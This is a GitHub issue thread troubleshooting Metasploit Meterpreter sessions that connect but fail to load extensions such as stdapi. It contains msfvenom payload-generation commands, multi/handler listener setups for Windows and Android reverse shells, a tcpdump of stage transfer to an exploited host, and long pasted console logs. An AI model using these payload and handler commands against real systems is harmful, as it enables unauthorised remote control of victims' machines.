Closed ghost closed 9 years ago
Can you please give us all the settings you're using? Please include:
in short, please type "show info" and dump it in here.
Bear in mind the following:
LHOST
is publicly visible.LHOST
is the same in the payload as it is in your listener.LPORT
is the same in the payload as it is in your listener.metsrv
and stdapi
before you try to execute commands. HTTP(S) payloads aren't the fastest.Just to sanity-check, I configured some simulated 'bad' networks, and while it at the worst it took several minutes to interact on a 200 Kbps, 500ms latency, 5% drop network, I couldn't reproduce a total failure as described above. On the other hand, intentionally setting LHOST incorrectly does lead to exactly this issue, e.g.:
meterpreter > load stdapi
[-] Failed to load extension: No response was received to the core_loadlib request.
I wonder if there is anything we could to do improve the user experience by providing load/liveness status in some way, other than just typing help over and over and waiting for commands to appear :) Maybe something that could appear under 'sessions'
When the session isn't fully initialised, there's no UID listed.
The listener was staged via
./msfconsole -q -L -x 'set workspace myworkspace; use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set LHOST 192.168.1.111; set LPORT 80; run -j'
The following is the payload connecting
And here are the settings in show info
The payload was originally generated about 4 weeks ago using msfpayload | msfencode.
Sorry, I meant show options
.
Also, please can you tell me how your payload was generated.
I should have caught that too. The IPs match.
I don't have the exact command that I used to generate the payload. But it was generated with msfpayload | msfencode. Which until about 2 weeks ago was working on a
msfcli multi/handler payload=windows/meterpreter/reverse_http LHOST=192.168.1.111 LPORT=80 E
It sounds like the LHOST
values doesn't match (despite you saying that they do.. sorry!). Your LHOST value in your multi/handlers shown above are local IPs (192.168.*
). That wouldn't be routable from the outside. My guess, based on you scrubbing out the IP addresses, is that they don't match.
Is that no fair to say?
Sorry but no.
It'll have to wait until tomorrow until I can dig any further. I will recreate the payload and attempt to do a better job scrubbing IPs before I post. I can do some testing tonight. But I likely won't report again until tomorrow.
@bcook-r7 Having some feedback that the session isn't dead or failed but still loading would be useful. I killed a few on a slow link recently because I thought it failed. In fact I only discovered that it wasn't failing due to walking away as it connected and came back about 10 mins later. I typed ls
and there it was. It had been working the whole time!
There is definitely a timeout baked in, otherwise it'd sit there forever. The fact that it can connect once shows that the initial payload is fine. However, something is wrong with the next stage if nothing goes right from there.
Does the target run some kind of AV? Because with reverse_http
metsrv goes up in the clear. It could be that it's getting caught?
There are more than AV controls in place. There is also at least a proxy in play here. Interesting. That could be it. The IP was flagged as serving malware by the proxy. However, I loaded the index on the attacker IP in a browser on the client machine before attempting the payload again. It loaded fine. But I did not attempt to download any files from the attacker's web server. I'll run some additional tests and report what I find.
I tried to duplicate the situation in my lab but ultimately could not reproduce the issue. However, I did confirm that it was not any of the controls that are in place preventing the full session to initiate. I did this by running the payload on a machine in my lab and the results was as I originally described. I'm not at all sure how the payload exe file has "corrupted", but that is what I'm going to chalk it up to. If I somehow manage to reproduce I will reopen.
Same problem here, just updated from bleeding edge. My setup:
Payload was generated like:
./msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=172.16.110.1 LPORT=8443 PayloadProxyHost=192.168.124.1 PayloadProxyPort=8081
(I also tried without the PayloadProxy* options, same result)
MSF handler:
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 172.16.110.1 yes The local listener hostname
LPORT 8443 yes The local listener port
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://172.16.110.1:8443/
[*] Starting the payload handler...
[*] 172.16.110.1:51640 (UUID: 41de17dff4850d44/x86=1/windows=1/2015-06-29T10:57:35Z) Staging Native payload ...
[*] Meterpreter session 1 opened (172.16.110.1:8443 -> 172.16.110.1:51640) at 2015-06-29 13:00:16 +0200
meterpreter > help
meterpreter > [-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter >
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
ssl_verify Modify the SSL certificate verification setting
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > load stdapi
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_loadlib request.
(also tried with&without the PayloadProxy options)
Burp proxy dump: https://drive.google.com/file/d/0B40sRmFcy0dpYzdOdTNwWXZSSjQ/view?usp=sharing
Are you setting the proxy options in the listener as well as the payload?
Yes, I've tried all combinations.
We currently had the same trouble occuring with a few sessions on low lattency networks ... Not sure if that may help but here the behavior I had :
the exploit/multi/handler successfully receive a connection ... But then, at some points, it hangs while downloading the remaining part of the meterpreter, wether it is loading priv, stdapi or extapi. The payload is windows/meterpreter/reverse_tcp.
Here is a tcpdump : a.b.c.d is the metasploit host while e.f.g.h is the exploited host.
19:40:53.694947 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 881541:882901, ack 1, win 29200, length 1360
19:40:53.694949 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 882901:884261, ack 1, win 29200, length 1360
19:40:53.862762 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 821701, win 65535, length 0
19:40:53.862785 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 884261:885621, ack 1, win 29200, length 1360
19:40:53.862788 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [P.], seq 885621:885811, ack 1, win 29200, length 190
19:40:53.862792 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 824421, win 65535, length 0
19:40:53.862799 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 827141, win 65535, length 0
19:40:53.863562 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 829861, win 65535, length 0
19:40:53.863578 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 832581, win 65535, length 0
19:40:53.875916 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 835301, win 65535, length 0
19:40:53.875932 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 838021, win 65535, length 0
19:40:53.875937 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 840741, win 65535, length 0
19:40:53.875940 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 843461, win 65535, length 0
19:40:53.875943 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 846181, win 65535, length 0
This occured a few times. It seems that once a PUSH flag is seen, something goes wrong. It may be due to some flags used when establishing the connection.
I have tried on different ports: 433, 5060 and eventually 2488. A last supposition is that depending on the port, some firewall, security solution may mess with the transmission of data.
I also tried to use the advanced option StageEncoding but it didn't change anything.
I also noted that having another connection from the same host like a shell, and continuing to send data like typing dir [Enter] a few times helps the loading of the extensions to complete successfully.
Not sure if this may help.
I was using an updated version of metasploit from the git, metasploit running on Debian 8 64 bits and target running Windows Server 2008.
hola muchachos e tenido un error muy raro me da conexion pero me la quita y pues estoy haciendo conexion por vpn ya que mi router no deja abrir puertos por la compañia y pues toco asi el lhost es la ip 0.tcp.ngrok.io que me da al hacer un ping ahi me aparece la ip esa es la que coloco en el lhost y lo coloco en el payload y lo coloco en metasploit y el puerto por default me lo da ngrok y yo coloco uno que yo ponga ej 80 ese solo lo coloco en metasploit en el payload va el default de ngrok ayuda.
@fuck-hacker:~# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ . ;' |@@@@ @@@ @ . ' @@@ @@ @@ ,
.@@@@ @@ .
',@@ @ ; ___
( 3 C ) /|_ / Metasploit! \
;@'. *,." |--- _____/
'(.,...."/
Love leveraging credentials? Check out bruteforcing in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.14.10-dev ]
msf > set android/meterpreter/reverse_tcp [-] Unknown variable Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value. If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's datastore. Use -g to operate on the global datastore
msf > use android/meterpreter/reverse_tcp msf payload(reverse_tcp) > set multi/handler [-] Unknown variable Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value. If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's datastore. Use -g to operate on the global datastore
msf payload(reverse_tcp) > use multi/handler msf exploit(handler) > set LHOST 52.15.183.149 LHOST => 52.15.183.149 msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > back msf > back msf > msf > use PAYLOAD android/meterpreter/reverse_tcp [-] Failed to load module: PAYLOAD msf > set PAYLOAD android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reverse_tcp msf > use multi/handler msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > set LHOST 52.15.183.149 LHOST => 52.15.183.149 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:12559:- - [] Started reverse TCP handler on 0.0.0.0:12559 [] Starting the payload handler... ^[[A^C[-] Exploit failed: Interrupt [*] Exploit completed, but no session was created. msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST 52.15.183.149 yes The listen address LPORT 12559 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LPORT 80 LPORT => 80 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 1 opened (127.0.0.1:80 -> 127.0.0.1:36376) at 2017-12-16 16:25:16 -0500
meterpreter > sysinfo [-] Unknown command: sysinfo. meterpreter > [*] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 2 opened (127.0.0.1:80 -> 127.0.0.1:36388) at 2017-12-16 16:25:39 -0500
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 2 closed. Reason: Died
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 3 opened (127.0.0.1:80 -> 127.0.0.1:36412) at 2017-12-16 16:26:59 -0500
meterpreter > machine_id meterpreter > [*] 127.0.0.1 - Meterpreter session 3 closed. Reason: Died [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > machine_id [+] Machine ID: 6d88e5da93c6e754c677c23a06910a96 msf exploit(handler) > machine_id [-] Unknown command: machine_id. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 4 opened (127.0.0.1:80 -> 127.0.0.1:36468) at 2017-12-16 16:28:42 -0500
meterpreter > shelp
[-] Unknown command: shelp.
meterpreter > help
meterpreter >
[*] 127.0.0.1 - Meterpreter session 4 closed. Reason: Died
[-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > info
Usage: info
Prints information about a post-exploitation module
msf exploit(handler) > info
Name: Generic Payload Handler
Module: exploit/multi/handler
Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows, Mainframe, Multi Privileged: No License: Metasploit Framework License (BSD) Rank: Manual
Provided by: hdm x@hdm.io
Available targets: Id Name
0 Wildcard Target
Payload information: Space: 10000000 Avoid: 0 characters
Description: This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.
msf exploit(handler) > sesions [-] Unknown command: sesions. msf exploit(handler) > help
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Command Description
------- -----------
check Check to see if a target is vulnerable
exploit Launch an exploit attempt
pry Open a Pry session on the current module
rcheck Reloads the module and checks if the target is vulnerable
recheck Alias for rcheck
reload Just reloads the module
rerun Alias for rexploit
rexploit Reloads the module and launches an exploit attempt
run Alias for exploit
msf exploit(handler) > sessions
No active sessions.
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 5 opened (127.0.0.1:80 -> 127.0.0.1:36502) at 2017-12-16 16:31:13 -0500
meterpreter > screenshot [-] Unknown command: screenshot. meterpreter > shjo [-] Unknown command: shjo. meterpreter > s [-] Unknown command: s. meterpreter > ss [-] Unknown command: ss. meterpreter > sd [-] Unknown command: sd. meterpreter > sd [-] Unknown command: sd. meterpreter > sdmeterpreter > sd [-] Unknown command: sd. smeterpreter > s [-] Unknown command: s. meterpreter > sd [-] Unknown command: sd. meterpreter > sd [-] Unknown command: sd. meterpreter > ds s[-] Unknown command: ds. dmeterpreter > sd [-] Unknown command: sd.
[*] 127.0.0.1 - Meterpreter session 5 closed. Reason: Died sdmeterpreter > sd [-] Unknown command: sd. msf exploit(handler) > dmsf exploit(handler) > set LPORT LPORT => 80 msf exploit(handler) > set LPORT 4040 LPORT => 4040 msf exploit(handler) > RUN [-] Unknown command: RUN. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:4040:- - [-] Handler failed to bind to 0.0.0.0:4040:- - [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4040). [*] Exploit completed, but no session was created. msf exploit(handler) > exploit
[-] Handler failed to bind to 52.15.183.149:4040:- - [-] Handler failed to bind to 0.0.0.0:4040:- - [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4040). [*] Exploit completed, but no session was created. msf exploit(handler) > set lPORT 80 lPORT => 80 msf exploit(handler) > RUN [-] Unknown command: RUN. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 6 opened (127.0.0.1:80 -> 127.0.0.1:36722) at 2017-12-16 16:33:26 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 7 opened (127.0.0.1:80 -> 127.0.0.1:36726) at 2017-12-16 16:33:27 -0500 [*] Sending stage (67614 bytes) to 127.0.0.1
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > transport meterpreter > [-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb [-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
meterpreter > sessions
Usage: sessions
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i
meterpreter > sessions -i id 1
Usage: sessions
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [*] 127.0.0.1 - Meterpreter session 6 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 7 closed. Reason: Died [] 127.0.0.1 - Meterpreter session 8 closed. Reason: Died load Usage: load ext1 ext2 ext3 ...
Loads a meterpreter extension module or modules.
OPTIONS:
-h Help menu.
-l List all available extensions
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 9 opened (127.0.0.1:80 -> 127.0.0.1:37130) at 2017-12-16 16:35:10 -0500
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [*] 127.0.0.1 - Meterpreter session 9 closed. Reason: Died
msf exploit(handler) > msf exploit(handler) > msf exploit(handler) > exploit
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 10 opened (127.0.0.1:80 -> 127.0.0.1:37138) at 2017-12-16 16:35:27 -0500
meterpreter > uuid [+] UUID: meterpreter > use meterpreter > [*] 127.0.0.1 - Meterpreter session 10 closed. Reason: Died
[-] Meterpreter session 9 is not valid and will be closed [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > machine_id [+] Machine ID: 6d88e5da93c6e754c677c23a06910a96 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 11 opened (127.0.0.1:80 -> 127.0.0.1:37222) at 2017-12-16 16:43:24 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 12 opened (127.0.0.1:80 -> 127.0.0.1:37226) at 2017-12-16 16:43:24 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 13 opened (127.0.0.1:80 -> 127.0.0.1:37230) at 2017-12-16 16:43:25 -0500
meterpreter > run[] 127.0.0.1 - Meterpreter session 11 closed. Reason: Died [] 127.0.0.1 - Meterpreter session 12 closed. Reason: Died
[*] 127.0.0.1 - Meterpreter session 13 closed. Reason: Died [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request.
if you get meterpreter but you cant get any control type this before enable the handler : "set AutoLoadStdapi true"
I've been having a reoccurring issue lately (last couple of weeks?). In a nutshell, I am getting a successful meterpreter connect on a
windows/meterpreter/reverse_http
payload. But when I try to execute meterpreter commands I get aIt happens for help, ls, getuid, sysinfo, all of the meterpreter commands.
In the past it seemed to be a timing issue where if I waited a while on slow links the commands would work as expected. However,
is new and seems like it could be serious.